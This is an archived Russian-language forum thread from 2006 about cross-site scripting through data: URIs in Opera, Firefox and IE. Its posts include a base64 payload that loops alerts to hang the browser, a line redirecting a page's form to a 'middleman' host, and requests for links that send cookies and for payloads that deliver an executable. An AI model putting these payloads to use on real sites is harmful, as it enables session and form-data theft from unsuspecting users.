В Опере такие уязвимости не прокатят, если пользователь не совсем дурак
24.09.2006 21:39:46
В Опере такие уязвимости не прокатят, если пользователь не совсем дурак
|
|
|
|
25.09.2006 07:35:15
Кто не хочет блокировать скрипты добавьте в заблокированное содержимое
data:*;base64* AJAX может работать не будет, но ИМХО мало кто его юзает |
|
|
|
25.09.2006 10:58:39
с осла-то можно перейти на другие браузеры. и если чувак не сделал это и подхватил что-то - это чисто его проблемы. но куда уходить с ФФ или оперы? я могу с ходу назвать 2-3 браузера, но они меня не слишком радуют. тем более один из них это переделанный осел. |
|||
|
|
25.09.2006 12:31:44
К слову о переходах на другой браузер. Мне седня опера предложила скачать новую версию 90.2 (девяносто точка два).
В этой версии вероятно, все мега секурно |
|
|
|
25.09.2006 14:14:02
незнаю, но в 9й опере не работает
|
|
|
|
25.09.2006 15:54:24
Как же сформировать правельную ссылку, чтобы куки отправлял? Тестил на phpBB и ФФ. |
|||
|
|
25.09.2006 16:31:18
Кидди, с помощью этого ничего не добиться. Так что забейте на это.
|
|
|
|
25.09.2006 16:36:14
Тут многим document.forms[0].action="http://middleman" будет достаточно.
|
|
|
|
25.09.2006 17:50:53
|
|||
|
|
25.09.2006 17:56:58
Открываем вот это и прощаемся с IE или FF:
data:text/html;base64,PHNjcmlwdD4gd2hpbGUgKDEpIHthbGVydCgiU2VsZi1jb250YWluZWQgWFNT |
|
|
|
25.09.2006 18:05:46
|
|||
|
|
26.09.2006 00:17:33
а как вам такой расклад:
data:image/jpg;base64,Qk04AgAAAAAAADYAAAAoAAAAEAAAABAAAAABABAAAAAAAAAAAAASCwAAEgsA |
|
|
|
26.09.2006 00:18:29
или даже так:
<html> <img src="data:image/jpg;base64,Qk04AgAAAAAAADYAAAAoAAAAEAAAABAAAAABABAAAAAAAAAAAAASCwAAEgsA </html> |
|
|
|
26.09.2006 00:32:01
about:cache?device=memory
много интерестного можно найти |
|
|
|
26.09.2006 08:13:05
А что мне нужно сделать чтобы создавался не ворд документ , а допустим рисунок , чтобы в нём было чего-то нарисовано , что я хочу , или лучще - ехе-шник
|
|
|
|
26.09.2006 17:53:09
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
|
|||
|
|
26.09.2006 18:39:54
По идее никакого XSS в протоколе data: нету, т.к. это совершенно новый сайт и куки текущего сайта в него передаваться не должны. Если в фоксе это работает, то это проблемы только фокса, да и то лишь пока не пофиксят.
А внедрить срипт в src через data: тоже нифига не получится ИМХО. |
|
|
|
27.09.2006 14:31:53
А что у осла должно быть включено\настроено? На 6 сказал, что не может отобразирть страницу. |
|||
|
|
29.09.2006 22:16:42
В Internet Explorer данный вектор атаки не работает (т.к. данный браузер не поддерживает протокол data). Работает лишь в Mozilla, Firefox, Opera и возможно в других браузерах (в частности в браузерах на движке Мозилы). Поэтому данная уязвимость имеет ограниченое использование, потому что в IE не работает, который всё ещё наиболее распространён.
Но при этом уязвимость весьма опасная, в том числе в контексте XSS (включая возможность, хоть и усложнённую, захвата куки). При умелом использовании, возможны различного рода атаки. Ну и учитываем, что альтернативные браузеры становятся всё более популярными. Вот к примеру разместил у себя на сайте Генератор XSS http: * .com.ua/xss_generator/ - для генерации самодостаточных XSS. Который упоминался в статье (разработанный автором сайта gnucitizen.org). |
||||
|
|
|||